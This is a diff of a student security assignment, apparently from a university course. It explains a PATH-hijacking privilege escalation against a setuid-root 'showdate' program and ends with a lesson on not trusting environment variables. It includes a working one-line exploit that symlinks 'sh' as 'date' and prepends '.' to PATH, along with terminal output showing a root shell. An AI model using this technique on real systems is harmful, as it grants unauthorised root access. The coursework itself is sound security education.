--- a/assignment4_s1010747_s4549775.md
+++ b/assignment4_s1010747_s4549775.md
@@ -54,6 +54,20 @@ write
 ```
 
 ## b
+We created a symbolic link called `date` in the current directory, to which we have write permissions as a non-privileged user, then we prepended the current directory to the `PATH` environment variable, which is also under out control.
+
+When the `showdate` executable is run, it assumes root privileges due to the `setuid` flag, and the owner of the file being root. It then looks up `date`, which internally uses the `PATH` variable, to which we prepended the directory with the symbolic link to `sh`. Instead of executing the `date` binary as intended, it therefore executes `sh` with root privileges, and we have a root shell.
+
+```
+hendrik ~/uni/assignment4 % id                                                        [master]
+uid=1000(hendrik) gid=100(users) groups=100(users),10(wheel),90(network),92(audio),93(optical),95(storage),98(power)
+hendrik ~/uni/assignment4 % ln -s $(which sh) date && PATH=.:$PATH ./showdate         [master]
+root ~/uni/assignment4 $ id
+uid=0(root) gid=0(root) groups=0(root),10(wheel),90(network),92(audio),93(optical),95(storage),98(power),100(users)
+```
+
+We implemented the attack as a `make` target, so it can simply be executed by running `make exploit`.
+
 ## c
 During the development of software intended to be run with `setuid-root`, special attention must be payed to not rely on any aspect of the environment controllable by non-root users. This includes environment variables. The attack was possible because the path to `date` was not hardcoded, but it was taken from the environment. We could not alter anything in `/usr/bin`, or `showdate` itself, but we could make the lookup for the `date` executable find what we wanted by altering the `PATH` environment variable, which does not require special privileges.
 
